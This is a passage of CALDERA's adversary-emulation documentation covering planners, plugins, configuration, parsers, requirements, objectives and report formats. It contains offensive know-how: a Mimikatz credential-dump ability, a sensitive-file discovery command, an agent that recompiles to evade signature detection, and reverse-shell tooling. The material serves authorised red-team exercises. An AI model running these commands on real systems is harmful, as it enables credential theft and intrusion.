agent matching the operating system (execution platform) of the ability and the ability command having no unsatisfied
facts. The batch planner will then send these ability commands to the agents and wait for them to be completed. After
each batch of ability commands is completed, the batch planner will again attempt to retrieve all ability commands
available for the operation and repeat the cycle. This is required because executing ability commands may unlock new ability commands, e.g. when required facts become available or new agents are spawned. The batch planner should be used for profiles containing repeatable abilities.
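The batch cycle can be sketched as a simple loop (illustrative; the real planner is asynchronous and works through the planning service):

```python
def run_batch(get_ready_commands, send_and_wait):
    """Sketch of the batch planner cycle described above.

    get_ready_commands() returns commands whose facts are satisfied;
    send_and_wait(commands) executes a batch (which may unlock new facts).
    Repeats until no further commands become available.
    """
    executed = []
    while True:
        batch = get_ready_commands()
        if not batch:
            break
        send_and_wait(batch)
        executed.extend(batch)
    return executed
```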
The buckets planner is an example planner that demonstrates how to build a custom planner and how to use the planning service utilities available to planners to aid in forming decision logic.
The batch and buckets planners can be found in the mitre/stockpile GitHub repository at app/batch.py and app/buckets.py.
See How to Build Planners for a full walkthrough of how to build a custom planner and incorporate any custom decision logic that is desired.
When creating a new operation, selecting a profile with repeatable abilities will disable both the atomic and the buckets
planners. Due to the behavior and functionality of these planners, repeatable abilities will result in the planner looping
infinitely on the repeatable ability. It is recommended to use the batch planner with profiles containing repeatable
abilities.
4.9 Plugins
CALDERA is built using a plugin architecture on top of the core system. Plugins are separate git repositories that plug
new features into the core system. Each plugin resides in the plugins directory and is loaded into CALDERA by adding
it to the local.yml file.
Plugins can be added through the UI or in the configuration file (likely conf/local.yml). Changes to the configuration file must be made while the server is shut down. The plugins will be enabled when the server restarts.
Each plugin contains a single hook.py file in its root directory. This file should contain an initialize function, which
gets called automatically for each loaded plugin when CALDERA boots. The initialize function contains the plugin
logic that is getting “plugged into” the core system. This function takes a single parameter:
• services: a list of core services that live inside the core system.
A plugin can add nearly any new functionality or features to CALDERA by using these services.
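A minimal hook.py skeleton consistent with the description above (the name and description attributes and the function body are illustrative assumptions, not CALDERA's exact API):

```python
# hook.py -- minimal plugin entry point (sketch; attribute names other than
# initialize/services are illustrative)
name = 'Example'
description = 'A minimal example plugin'

def initialize(services):
    # services: the core services passed in when CALDERA boots; a real
    # plugin would use them to register routes, abilities, etc.
    return list(services)
```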
A list of plugins included with CALDERA can be found on the Plugin library page.
FIVE
SERVER CONFIGURATION
Caldera’s configuration file is located at conf/local.yml, written on the first run. If the server is run with the
--insecure option (not recommended), CALDERA will use the file located at conf/default.yml.
Configuration file changes must be made while the server is shut down. Any changes made to the configuration file
while the server is running will be overwritten.
The YAML configuration file contains all the configuration variables CALDERA requires to boot up and run. A
documented configuration file is below:
ability_refresh: 60 # Interval at which ability YAML files will refresh from disk
api_key_blue: BLUEADMIN123 # API key which grants access to CALDERA blue
api_key_red: ADMIN123 # API key which grants access to CALDERA red
app.contact.dns.domain: mycaldera.caldera # Domain for the DNS contact server
app.contact.dns.socket: 0.0.0.0:53 # Listen host and port for the DNS contact server
app.contact.gist: API_KEY # API key for the GIST contact
app.contact.html: /weather # Endpoint to use for the HTML contact
app.contact.http: http://0.0.0.0:8888 # Server to connect to for the HTTP contact
app.contact.tcp: 0.0.0.0:7010 # Listen host and port for the TCP contact server
app.contact.udp: 0.0.0.0:7011 # Listen host and port for the UDP contact server
app.contact.websocket: 0.0.0.0:7012 # Listen host and port for the Websocket contact server
Custom configuration files can be created with a new file in the conf/ directory. The name of the config file can then
be specified with the -E flag when starting the server.
Caldera will choose the configuration file to use in the following order:
1. A config specified with the -E or --environment command-line options. For instance, if started with python
caldera.py -E foo, CALDERA will load its configuration from conf/foo.yml.
2. conf/local.yml: Caldera will prefer the local configuration file if no other options are specified.
3. conf/default.yml: If no config is specified with the -E option and it cannot find a conf/local.yml configuration file, CALDERA will use its default configuration options.
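The selection order can be summarized in a small sketch (illustrative only):

```python
def choose_config(environment=None, existing_files=()):
    """Pick the configuration file in the precedence order listed above."""
    if environment:                               # 1. -E / --environment
        return 'conf/%s.yml' % environment
    if 'conf/local.yml' in existing_files:        # 2. local config
        return 'conf/local.yml'
    return 'conf/default.yml'                     # 3. fallback default
```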
CALDERA can be configured to allow users to log in using LDAP. To do so, add an ldap section to the config with the
following fields:
• dn: the base DN under which to search for the user
• server: the URL of the LDAP server, optionally including the scheme and port
• user_attr: the name of the attribute on the user object to match with the username, e.g. cn or sAMAccountName.
Default: uid
• group_attr: the name of the attribute on the user object to match with the group, e.g. MemberOf or group.
Default: objectClass
• red_group: the value of the group_attr that specifies a red team user. Default: red
For example:
ldap:
dn: cn=users,cn=accounts,dc=demo1,dc=freeipa,dc=org
server: ldap://ipa.demo1.freeipa.org
user_attr: uid
group_attr: objectClass
red_group: organizationalperson
By default, users authenticate to CALDERA by providing credentials (username and password) in the main login
page. These credentials are verified using CALDERA’s internal user mapping, or via LDAP if LDAP login is enabled for CALDERA. If users want to use a different login handler, such as one that handles SAML authentication
or a login handler provided by a CALDERA plugin, the auth.login.handler.module keyword in the CALDERA
configuration file must be changed from its value of default, which is used to load the default login handler. The configuration value, if not default, must be a Python import path string corresponding to the custom login handler relative to the main CALDERA directory (e.g. auth.login.handler.module: plugins.customplugin.app.my_custom_handler). If the keyword is not provided, the default login handler will be used.
The Python module referenced in the configuration file must implement the following method:
def load_login_handler(services):
    """Return a Python object that extends LoginHandlerInterface from app.service.interfaces.i_login_handler."""
When loading custom login handlers, CALDERA expects the referenced Python module to return an object that extends
LoginHandlerInterface from app.service.interfaces.i_login_handler. This interface provides all of the
methods that CALDERA’s authentication service requires to handle logins. If an invalid login handler is referenced in
the configuration file, then the server will exit with an error.
An example login handler Python module may follow the following structure:
def load_login_handler(services):
return CustomLoginHandler(services, HANDLER_NAME)
class CustomLoginHandler(LoginHandlerInterface):
def __init__(self, services, name):
super().__init__(services, name)
SIX
PLUGIN LIBRARY
Here you’ll get a run-down of all open-source plugins, all of which can be found in the plugins/ directory as separate Git repositories.
To enable a plugin, add it to the default.yml file in the conf/ directory. Make sure your server is stopped when
editing the default.yml file.
Plugins can also be enabled through the GUI. Go to Advanced -> Configuration and then click on the ‘enable’ button
for the plugin you would like to enable.
6.1 Sandcat
The Sandcat plugin contains CALDERA’s default agent, which is written in GoLang for cross-platform compatibility.
The agent will periodically beacon to the C2 server to receive instructions, execute instructions on the target host, and
then send results back to the C2 server. The agent also supports payload downloads, file uploads, and a variety of
execution and C2 communication options. For more details, see the Sandcat plugin documentation.
6.1.1 Deploy
To deploy Sandcat, use one of the built-in delivery commands, which allow you to run the agent on any operating system.
Each of these commands downloads the compiled Sandcat executable from CALDERA and runs it immediately. Find
the commands on the Sandcat plugin tab.
Once the agent is running, it should show log messages when it beacons into CALDERA.
If you have GoLang installed on the CALDERA server, each time you run one of the delivery commands above, the agent will re-compile itself dynamically and change its source code so it gets a different file hash (MD5) and a random name that blends into the operating system. This helps bypass file-based signature detections.
6.1.2 Options
When deploying a Sandcat agent, there are optional parameters you can use when you start the executable:
• Server: This is the location of CALDERA. The agent must have connectivity to this host/port.
• Group: This is the group name that you would like the agent to join when it starts. The group does not have to
exist. A default group of my_group will be used if none is passed in.
• v: Use -v to see verbose output from sandcat. Otherwise, sandcat will run silently.
6.1.3 Extensions
In order to keep the agent code lightweight, the default Sandcat agent binary ships with limited basic functionality.
Users can dynamically compile additional features, referred to as “gocat extensions”. Each extension adds to the
existing gocat module code to provide functionality such as peer-to-peer proxy implementations, additional executors,
and additional C2 contact protocols.
To request particular gocat extensions, users can include the gocat-extensions HTTP header when asking the C2 to
compile an agent. The header value must be a comma-separated list of requested extensions. The server will include
the extensions in the binary if they exist and if their dependencies are met (i.e. if extension A requires a particular
Golang module that is not installed on the server, then extension A will not be included).
For example, a client can request that the C2 server include the proxy_http and shells extensions by sending the HTTP header gocat-extensions: proxy_http,shells when downloading the agent.
It’s possible to customize the default values of these options when pulling Sandcat from the CALDERA server.
This is useful if you want to hide the parameters from the process tree. You can do this by passing the values in as
headers instead of as parameters.
For example, a Linux executable can be downloaded that uses http://10.0.0.2:8888 as the server address instead of http://localhost:8888 by supplying the server value as a header.
6.2 Mock
The Mock plugin adds a set of simulated agents to CALDERA and allows you to run complete operations without
hooking any other computers up to your server.
These agents are created inside the conf/agents.yml file. They can be edited and you can create as many as you’d
like. A sample agent looks like:
- paw: 1234
username: darthvader
host: deathstar
group: simulation
platform: windows
location: C:\Users\Public
enabled: True
privilege: User
c2: HTTP
exe_name: sandcat.exe
executors:
- pwsh
- psh
After you load the mock plugin and restart CALDERA, all simulated agents will appear as normal agents in the Chain
plugin GUI and can be used in any operation.
6.3 Manx
The terminal plugin adds reverse-shell capability to CALDERA, along with a TCP-based agent called Manx.
When this plugin is loaded, you’ll get access to a new GUI page which allows you to drop reverse-shells on target hosts
and interact manually with the hosts.
You can use the terminal emulator on the Terminal GUI page to interact with your sessions.
6.4 Stockpile
6.5 Response
The response plugin is an autonomous incident response plugin, which can fight back against adversaries on a compromised host.
Similar to the stockpile plugin, it contains adversaries, abilities, and facts intended for incident response. These components are all loaded through the plugins/response/data/* directory.
6.6 Compass
Create visualizations to explore TTPs. Follow the steps below to create your own visualization:
1. Click ‘Generate Layer’
2. Click ‘+’ to open a new tab in the navigator
3. Select ‘Open Existing Layer’
4. Select ‘Upload from local’ and upload the generated layer file
Compass leverages the ATT&CK Navigator; for more information, see: https://github.com/mitre-attack/attack-navigator
6.7 Caltack
The caltack plugin adds the public MITRE ATT&CK website to CALDERA. This is useful for deployments of
CALDERA where an operator cannot access the Internet to reference the MITRE ATT&CK matrix.
After loading this plugin and restarting, the ATT&CK website is available from the CALDERA home page. Not
all parts of the ATT&CK website will be available - but we aim to keep those pertaining to tactics and techniques
accessible.
6.8 SSL
Note: OpenSSL must be installed on your system to generate a new self-signed certificate
1. In the root CALDERA directory, navigate to plugins/ssl.
2. Place a PEM file containing SSL public and private keys in conf/certificate.pem. Follow the instructions
below to generate a new self-signed certificate:
• In a terminal, paste the command openssl req -x509 -newkey rsa:4096 -out conf/certificate.pem -keyout conf/certificate.pem -nodes and press enter.
• This will prompt you for identifying details. Enter your country code when prompted. You may leave the
rest blank by pressing enter.
3. Copy the file haproxy.conf from the templates directory to the conf directory.
4. Open the file conf/haproxy.conf in a text editor.
5. On the line bind *:8443 ssl crt plugins/ssl/conf/insecure_certificate.pem, replace
insecure_certificate.pem with certificate.pem.
6. On the line server caldera_main 127.0.0.1:8888 cookie caldera_main, replace 127.0.0.1:8888
with the host and port defined in CALDERA’s conf/local.yml file. This should not be required if CALDERA’s
configuration has not been changed.
7. Save and close the file. Congratulations! You can now use CALDERA securely by accessing the UI at https://[YOUR_IP]:8443 and redeploying agents using the HTTPS service.
6.9 Atomic
The Atomic plugin imports all Red Canary Atomic tests from their open-source GitHub repository.
6.10 GameBoard
The GameBoard plugin allows you to monitor both red and blue team operations. The game tracks points for both sides
and determines which one is “winning”. The scoring seeks to quantify the amount of true/false positives/negatives
produced by the blue team. The blue team is rewarded points when they are able to catch the red team’s actions, and
the red team is rewarded when the blue team is not able to correctly do so. Additionally, abilities are rewarded different
amounts of points depending on the tactic they fulfill.
To begin a gameboard exercise, first log in as blue user and deploy an agent. The ‘Auto-Collect’ operation will execute
automatically. Alternatively, you can begin a different operation with the blue agent if you desire. Log in as red user
and begin another operation. Open up the gameboard plugin from the GUI and select these new respective red and blue
operations to monitor points for each operation.
6.11 Human
The Human plugin allows you to build “Humans” that will perform user actions on a target system as a means to
obfuscate red actions by Caldera. Each human is built for a specific operating system and leverages the Chrome browser
along with other native OS applications to perform a variety of tasks. Additionally, these humans can have various
aspects of their behavior “tuned” to add randomization to the behaviors on the target system.
On the CALDERA server, there are additional Python packages required in order to use the Human plugin. These packages can be installed by navigating to the plugins/human/ directory and running the command pip3 install -r requirements.txt.
With the Python packages installed and the plugin enabled in the configuration file, the Human plugin is ready for use.
When opening the plugin within CALDERA, there are a few actions that the human can perform. Check the box for
each action you would like the human to perform. Once the actions are selected, then “Generate” the human.
The generated human will show a deployment command for how to run it on a target machine. Before deploying the
human on a target machine, there are 3 requirements:
1. Install python3 on the target machine
2. Install the python package virtualenv on the target machine
3. Install Google Chrome on the target machine
Once the requirements above are met, then copy the human deployment command from the CALDERA server and run
it on the target machine. The deployment command downloads a tar file from the CALDERA server, un-archives it,
and starts the human using python. The human runs in a python virtual environment to ensure there are no package
conflicts with pre-existing packages.
6.12 Training
This plugin allows a user to gain a “User Certificate” which proves their ability to use CALDERA. This is the first
of several certificates planned in the future. The plugin takes you through a capture-the-flag style certification course, covering all parts of CALDERA.
6.13 Access
This plugin allows you to task any agent with any ability from the database. It also allows you to conduct Initial Access
Attacks.
The Access plugin also allows for the easy creation of abilities for Metasploit exploits.
Prerequisites:
• An agent running on a host that has Metasploit installed and initialized (run it once to set up Metasploit’s database)
• The app.contact.http option in CALDERA’s configuration includes http://
• A fact source that includes a app.api_key.red fact with a value equal to the api_key_red option in
CALDERA’s configuration
Within the build-capabilities tactic there is an ability called Load Metasploit Abilities. Run this ability
with an agent and fact source as described above, which will add a new ability for each Metasploit exploit. These
abilities can then be found under the metasploit tactic. Note that this process may take 15 minutes.
If the exploit has options you want to use, you’ll need to customize the ability’s command field. Start an operation in manual mode, and modify the command field before adding the potential link to the operation. For example, to set RHOSTS for the exploit, modify command to include set RHOSTS <MY_RHOSTS_VALUE>; between use <EXPLOIT_NAME>; and run.
Alternatively, you can set options by adding a fact for each option with the msf. prefix. For example, to set RHOSTS, add a fact called msf.RHOSTS. Then in the ability’s command field add set RHOSTS #{msf.RHOSTS}; between use <EXPLOIT_NAME>; and run.
6.14 Builder
The Builder plugin enables CALDERA to dynamically compile code segments into payloads that can be executed as
abilities by implants. Currently, only C# is supported.
See Dynamically-Compiled Payloads for examples on how to create abilities that leverage these payloads.
6.15 Debrief
The Debrief plugin provides a method for gathering overall campaign information and analytics for a selected set of
operations. It provides a centralized view of operation metadata and graphical displays of the operations, the techniques
and tactics used, and the facts discovered by the operations.
The plugin additionally supports the export of campaign information and analytics in PDF format.
SEVEN
PARSERS
CALDERA uses parsers to extract facts from command output. A common use case is to allow operations to take
gathered information and feed it into future abilities and decisions - for example, a discovery ability that looks for
sensitive files can output file paths, which will then be parsed into file path facts, and a subsequent ability can use those
file paths to stage the sensitive files in a staging directory.
Parsers can also be used to create facts with relationships linked between them - this allows users to associate facts
together, such as username and password facts.
Under the hood, parsers are Python modules that get called when the agent sends command output to the CALDERA server and certain conditions are met:
server and certain conditions are met:
• If the corresponding ability has a specified parser associated with the command, the parser module will be loaded
and used to parse out any facts from the output. This will occur even if the agent ran the command outside of an
operation
• If the agent ran the command as part of an operation, but the corresponding ability does not have any specified
parsers associated with the command, CALDERA will check if the operation was configured to use default
parsers. If so, any default parsers loaded within CALDERA will be used to parse out facts from the output.
Otherwise, no parsing occurs.
• If the agent ran the command outside of an operation, but the corresponding ability does not have any specified
parsers associated with the command, CALDERA will use its default parsers to parse the output.
Non-default parser Python modules are typically stored in individual plugins, such as stockpile, in the plugin’s app/parsers/ directory. For instance, if you look in plugins/stockpile/app/parsers, you can see a variety of parsers that are provided out-of-the-box.
Default parsers are located in the core CALDERA repo, under app/learning. Two example modules are p_ip.py
and p_path.py, which are used to parse IP addresses and file paths, respectively. Note that the default parsers have a
different location due to their association with the learning service.
To associate specific parsers to an ability command, use the parsers keyword in the yaml file within the executor
section (see the below example).
darwin:
  sh:
    command: |
      find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -size -500k 2>/dev/null | head -5
    parsers:
      plugins.stockpile.app.parsers.basic:
        - source: host.file.path
          edge: has_extension
          target: file.sensitive.extension
Note that the parsers value is a nested dictionary whose key is the Python module import path of the parser to reference; in this case, plugins.stockpile.app.parsers.basic for the parser located in plugins/stockpile/app/parsers/basic.py. The value of this inner dict is a list of fact mappings that tell the parser what facts and relationships to save based on the output. In this case, we only have one mapping in the list.
Each mapping consists of the following:
• Source (required): A fact to create for any matches from the parser
• Edge (optional): A relationship between the source and target. This should be a string.
• Target (optional): A fact to create which the source connects to.
In the above example, the basic parser will take each line of output from the find command, save it as a host.file.
path fact, and link it to the file.sensitive.extension fact used in the command with the has_extension edge.
For instance, if the command was run using a file.sensitive.extension value of docx and the find command
returned /path/to/mydoc.docx and /path/to/sensitive.docx, the parser would generate the following facts
and relationships:
• /path/to/mydoc.docx <- has_extension -> docx
• /path/to/sensitive.docx <- has_extension -> docx
Note that only one parser can be linked to a command at a time, though a single parser can be used to generate multiple
facts, as in our hypothetical example above. Also note that the parser only works for the associated command executor,
so you can use different parsers for different executors and even different platforms.
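Conceptually, a fact mapping works like the following sketch (the function name and data shapes here are hypothetical, not the actual Stockpile parser interface):

```python
# Sketch of how a "basic"-style parser mapping turns command output into
# facts and relationships. Function name and shapes are hypothetical.

def apply_mapping(output, source_trait, edge=None, target=None):
    """Create one source fact per non-empty output line, optionally
    linked to an existing target fact through the edge."""
    relationships = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        source = (source_trait, line)  # e.g. ('host.file.path', '/path/to/mydoc.docx')
        relationships.append((source, edge, target))
    return relationships

rels = apply_mapping(
    "/path/to/mydoc.docx\n/path/to/sensitive.docx",
    "host.file.path",
    edge="has_extension",
    target=("file.sensitive.extension", "docx"),
)
```

Each line of output becomes a new source fact, while the edge and target tie it back to the fact that seeded the command.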
The example below shows a more complicated parser - the katz parser in the stockpile plugin. This example has
multiple fact mappings for a single parser, since we want to extract different types of information from the Mimikatz
output - in particular, the password and password hash information.
platforms:
  windows:
    psh:
      command: |
        Import-Module .\invoke-mimi.ps1;
        Invoke-Mimikatz -DumpCreds
      parsers:
        plugins.stockpile.app.parsers.katz:
          - source: domain.user.name
            edge: has_password
            target: domain.user.password
          - source: domain.user.name
            edge: has_hash
            target: domain.user.ntlm
          - source: domain.user.name
            edge: has_hash
            target: domain.user.sha1
      payloads:
        - invoke-mimi.ps1
This time, we are using plugins.stockpile.app.parsers.katz, which will take the output from the
Invoke-Mimikatz -DumpCreds command and apply the three specified mappings when parsing the output. Note that in
all three mappings, the source fact is the same: domain.user.name, but the relationship edges and target facts are all
different, based on what kind of information we want to save. The resulting facts, assuming the command was successful
and provided the desired information, will include the username, password, NTLM hash, and SHA1 hash, all linked
together with the appropriate relationship edges.
CHAPTER
EIGHT
RELATIONSHIPS
Many CALDERA abilities require input variables called “facts” to be provided before the ability can be run. These
facts can be provided through fact sources, or they can be discovered by a previous ability.
8.1.1 Example
As an example, the following printer discovery ability will create two facts called host.print.file and host.
print.size:
- id: 6c91884e-11ec-422f-a6ed-e76774b0daac
  name: View printer queue
  description: View details of queued documents in printer queue
  tactic: discovery
  technique:
    attack_id: T1120
    name: Peripheral Device Discovery
  platforms:
    darwin:
      sh:
        command: lpq -a
        parsers:
          plugins.stockpile.app.parsers.printer_queue:
            - source: host.print.file
              edge: has_size
              target: host.print.size
This ability will view the printer queue using the command lpq -a. The result of lpq -a will be parsed into two facts:
host.print.file (the source) and host.print.size (the target). These two facts are dependent on each other,
and it will be helpful to understand their connection in order to use them. Therefore, we use the edge variable to explain
the relationship between the source and the target. In this case, the edge is has_size, because host.print.size
is the file size of host.print.file. All together, the source, edge, and target comprise a “relationship”. To learn
more about how the parser file creates a relationship, refer to Parsers.
Storing the relationship between the source and the target in the edge allows CALDERA to save several instances of
each fact while maintaining the connection between facts. For example, if the printer discovery ability (shown above)
is run, and several files are discovered in the printer queue, the following facts may be created:

host.print.file    host.print.size
essay.docx         12288
image-1.png        635000
Flier.pdf          85300

The table above shows how each host.print.file value is associated with exactly one host.print.size value.
This demonstrates the importance of the edge; it maintains the association between each pair of source and target
values. Without the edge, we would just have a list of values but no information about their relationships, similar to
the following:
• host.print.file: essay.docx, image-1.png, Flier.pdf
• host.print.size: 12288, 635000, 85300
Note that the edge and the target are optional. You can create a source as an independent fact without needing to
connect it to a target.
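The value of storing the edge can be sketched with hypothetical data (plain tuples here, not CALDERA's internal fact objects):

```python
# Flat lists lose the pairing between file and size...
files = ["essay.docx", "image-1.png", "Flier.pdf"]
sizes = [12288, 635000, 85300]

# ...while relationships (source, edge, target) preserve it.
relationships = [
    ("essay.docx", "has_size", 12288),
    ("image-1.png", "has_size", 635000),
    ("Flier.pdf", "has_size", 85300),
]

def size_of(filename):
    """Follow the has_size edge from a host.print.file value."""
    for source, edge, target in relationships:
        if source == filename and edge == "has_size":
            return target
    return None
```

Without the edges, nothing connects a given file to its size; with them, the lookup is unambiguous.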
Relationships can also be created in the CALDERA Server GUI. Use the left sidebar to navigate to “fact sources.”
Then, click “relationships” followed by “new relationship.” You can fill in values for the edge, source, and target
to be used in future operations. Then click “Save” to finish!
CHAPTER
NINE
REQUIREMENTS
Requirements are a mechanism used by CALDERA to determine whether an ability should be run in the course of an
operation. By default, CALDERA supplies several requirements within the Stockpile plugin that can be used by an
ability to ensure the ability only runs when the facts being used by the ability command meet certain criteria.
Requirements are defined in a Python module and are then referenced inside an ability. Every requirement must be
provided with at least a source fact to enforce the defined requirement on. Depending on the module, a requirement
may also need an edge value and a target fact as arguments.
See Relationships for more information on relationship source, edge, and target values.
9.1 Example
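The example ability itself is not shown here; based on the description that follows, its requirements section would look roughly like this (the module paths follow the Stockpile convention; treat the exact layout as illustrative):

```yaml
requirements:
  - plugins.stockpile.app.requirements.paw_provenance:
      - source: host.user.name
  - plugins.stockpile.app.requirements.basic:
      - source: host.user.name
        edge: has_password
        target: host.user.password
```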
Notice that the ability command uses two facts: host.user.name and host.user.password. The paw_provenance
requirement enforces that only host.user.name facts discovered by the agent running the ability can be used (i.e.,
the fact originated from the same paw). In a scenario where this ability is run against two agents on two different
hosts, and multiple host.user.name and host.user.password facts have been discovered, paw_provenance prevents
facts discovered by the first agent on the first host from being used by the second agent on the second host. This
ensures facts discovered locally on one host are only used on the host where they apply, such as when
host.user.name is a local account that only exists on the host where it was discovered. The paw_provenance
requirement could similarly be applied to discovered files, file paths, and running processes, all of which are
host-local information that should not be used globally by other agents in an operation.
Additionally, the basic requirement enforces that only host.user.name facts with an existing has_password rela-
tionship to an existing host.user.password fact may be used. Brute forcing all available combinations of host.
user.name facts and host.user.password facts could result in high numbers of failed login attempts or locking out
an account entirely. The basic requirement ensures that the user and password combination used has a high chance
of success since the combination’s relationship has already been established by a previous ability.
Together, these requirements ensure that the CALDERA operation will only attempt reliable combinations of
host.user.name and host.user.password facts specific to the agent running the ability, instead of arbitrarily
attempting all possible combinations available to the agent.
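The combined filtering described above can be sketched in a few lines (hypothetical in-memory structures; the real requirement modules operate on CALDERA's link and fact objects):

```python
# Facts as (trait, value, paw_of_collecting_agent); relationships as
# (source_value, edge, target_value). Both are hypothetical shapes.
facts = [
    ("host.user.name", "alice", "agent1"),
    ("host.user.name", "bob", "agent2"),
    ("host.user.password", "hunter2", "agent1"),
]
relationships = [("alice", "has_password", "hunter2")]

def usable_combinations(paw):
    """(user, password) pairs that satisfy paw_provenance and basic."""
    # paw_provenance: only usernames the requesting agent itself discovered.
    users = [v for t, v, p in facts if t == "host.user.name" and p == paw]
    passwords = [v for t, v, p in facts if t == "host.user.password"]
    # basic: only pairs with an established has_password relationship.
    return [(u, pw) for u in users for pw in passwords
            if (u, "has_password", pw) in relationships]
```

Here agent1 may use alice's credentials, while agent2 gets nothing: bob was discovered elsewhere and has no established has_password relationship.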
CHAPTER
TEN
OBJECTIVES
As part of ongoing efforts to increase the capabilities of CALDERA’s Planners, the team has implemented Objectives.
Objectives are collections of fact targets, called Goals, which can be tied to Adversaries. When an Operation starts, the
Operation will store a copy of the Objective linked to the chosen Adversary, defaulting to a base Goal of “running until
no more steps can be run” if no Objective can be found. During the course of an Operation, every time the planner
moves between buckets, the current Objective status is evaluated in light of the current knowledge of the Operation,
with the Operation completing should all goals be met.
10.1 Objectives
id: 7ac9ef07-defa-4d09-87c0-2719868efbb5
name: testing
description: This is a test objective that is satisfied if it finds a user with a username of 'test'
goals:
  - count: 1
    operator: '='
    target: host.user.name
    value: 'test'
Objectives can be tied to Adversaries either through the Adversaries web UI, or by adding a line similar to the following
to the Adversary’s YAML file:
objective: 7ac9ef07-defa-4d09-87c0-2719868efbb5
10.2 Goals
Goal objects can be examined at app/objects/secondclass/c_goal.py. Goal objects are handled as extensions
of Objectives, and are not intended to be interacted with directly.
Goal objects utilize four attributes, documented below:
• target: The fact associated with this goal, e.g. host.user.name
• value: The value this fact should have, e.g. test
• count: The number of times this goal should be met in the fact database for it to be satisfied; defaults to infinity (2^20)
• operator: The relationship to validate between the target and value. Valid operators include:
– <: Less Than
– >: Greater Than
– <=: Less Than or Equal to
– >=: Greater Than or Equal to
– in: X in Y
– *: Wildcard - Matches on existence of target, regardless of value
– ==: Equal to
Goals can be input to CALDERA either through the Objectives web UI modal or through Objective YAML files, where
they can be added as list entries under goals. In the example below, the Objective references two Goals: one that
targets the specific username test, and another that is satisfied by any two acquired usernames:
goals:
  - count: 1
    operator: '='
    target: host.user.name
    value: 'test'
  - count: 2
    operator: '*'
    target: host.user.name
    value: 'N/A'
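Goal evaluation can be sketched as follows (a simplification; the real logic lives in c_goal.py and differs in detail):

```python
import operator

# Map of goal operators to comparison functions (illustrative subset).
OPERATORS = {
    "<": operator.lt, ">": operator.gt, "<=": operator.le,
    ">=": operator.ge, "==": operator.eq, "=": operator.eq,
    "in": lambda fact_value, goal_value: goal_value in fact_value,
    "*": lambda fact_value, goal_value: True,  # wildcard: existence of the target fact
}

def goal_satisfied(goal, fact_store):
    """A goal is met once enough facts match its target/operator/value."""
    op = OPERATORS[goal["operator"]]
    matches = sum(1 for trait, value in fact_store
                  if trait == goal["target"] and op(value, goal["value"]))
    return matches >= goal["count"]

# The two goals from the YAML example above, against a small fact store.
store = [("host.user.name", "test"), ("host.user.name", "admin")]
exact = {"target": "host.user.name", "operator": "=", "value": "test", "count": 1}
any_two = {"target": "host.user.name", "operator": "*", "value": "N/A", "count": 2}
```

With this store, the exact goal is met by the single "test" username, and the wildcard goal is met because any two usernames exist.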
CHAPTER
ELEVEN
OPERATION RESULTS
The “Operations” tab enables users to view past operations, create new operations, and export operation reports in JSON
or CSV format. When starting a new operation, the “Operations” tab UI provides information on which commands are
executed, their status as recorded by the CALDERA C2 server, and the captured stdout and stderr as applicable.
After completing an operation, you can explore the operation’s setup, progress, and execution graph using the “Debrief”
plugin. Debrief also provides executive-level overviews of the operation’s progress and the attack’s success as a PDF
report.
After an operation runs, you can export the results in two different JSON formats: an operation report or operation event
logs. Both are rich sources of information on the technical specifics of which commands were executed, at what time,
and with what result. The event logs report ability-level execution records, while the operation report covers a broader
range of target, contact, and planning information. The structures of each are compared in the Operation Report and
Event Logs sections.
The operation report JSON consists of a single dictionary with the following keys and values:
• name: String representing the name of the operation
• host_group: JSON list of dictionary objects containing information about an agent in the operation.
• start: String representing the operation start time in YYYY-MM-DD HH:MM:SS format.
• steps: nested JSON dict that maps agent paw strings to an inner dict which maps the string key steps to a list
of dict objects. Each innermost dict contains information about a step that the agent took during the operation:
– link_id: String representing the UUID of the executed link.
– ability_id: String representing the UUID of the corresponding ability for the command. (e.g.
90c2efaa-8205-480d-8bb6-61d90dbaf81b)
– command: String containing the base64 encoding of the command that was run.
– delegated: Timestamp string in YYYY-MM-DD HH:MM:SS format that indicates when the operation
made the link available for collection
– run: Timestamp string in YYYY-MM-DD HH:MM:SS format that indicates when the agent submitted the
execution results for the command.
– status: Int representing the status code for the command.
– platform: String representing the operating system on which the command was run.
– executor: String representing which agent executor was used for the command (e.g. psh for PowerShell).
– pid: Int representing the process ID for running the command.
45
caldera
– description: String representing the command description, taken from the corresponding ability description.
– name: String representing the command name, taken from the corresponding ability name.
– attack: JSON dict containing ATT&CK-related information for the command, based on the ATT&CK
information provided by the corresponding ability:
∗ tactic: ATT&CK tactic for the command ability.
∗ technique_name: Full ATT&CK technique name for the command.
∗ technique_id: ATT&CK technique ID for the command (e.g. T1005)
– output: optional field. Contains the output generated when running the command. Only appears if the
user selected the include agent output option when downloading the report.
– agent_reported_time: Timestamp string representing the time at which the command was run, as reported
by the agent, in YYYY-MM-DD HH:MM:SS format. This field will not be present if the agent does not support
reporting the command execution time.
• finish: Timestamp string in YYYY-MM-DD HH:MM:SS format that indicates when the operation finished.
• planner: Name of the planner used for the operation.
• adversary: JSON dict containing information about the adversary used in the operation
– atomic_ordering: List of strings that contain the ability IDs for the adversary.
– objective: objective UUID string for the adversary.
– tags: List of adversary tags
– has_repeatable_abilities: A boolean flag indicating if any ability in the adversary is repeatable.
– name: Adversary name
– description: Adversary description
– plugin: The adversary’s source plugin (e.g. stockpile)
– adversary_id: Adversary UUID string
• jitter: String containing the min/max jitter values.
• objectives: JSON dict containing information about the operation objective.
• facts: list of dict objects, where each dict represents a fact used or collected in the operation.
– origin_type: String representation of the fact’s origin (e.g. SEEDED if seeded by the operation’s fact
source or LEARNED if the fact was learned during execution of the operation)
– created: String representing the fact creation time in YYYY-MM-DD HH:MM:SS format
– name: String representation of the fact’s name in major to minor format (e.g. file.sensitive.
extension for a sensitive file extension)
– source: A string representing the UUID of the fact source containing this fact
– score: Integer representing the fact score
– value: A string representing the fact’s value (e.g. a fact named file.sensitive.extension may have
a value yml)
– links: A list of UUID strings identifying the links that generated this fact
– limit_count: Integer representing the maximum number of occurrences this fact can have in the fact
source; defaults to -1
{
"adversary": {
"adversary_id": "1a98b8e6-18ce-4617-8cc5-e65a1a9d490e",
"atomic_ordering": [
"6469befa-748a-4b9c-a96d-f191fde47d89",
"90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"4e97e699-93d7-4040-b5a3-2e906a58199e",
"300157e5-f4ad-4569-b533-9d1fa0e74d74",
"ea713bc4-63f0-491c-9a6f-0b01d560b87e"
],
"description": "An adversary to steal sensitive files",
"has_repeatable_abilities": false,
"name": "Thief",
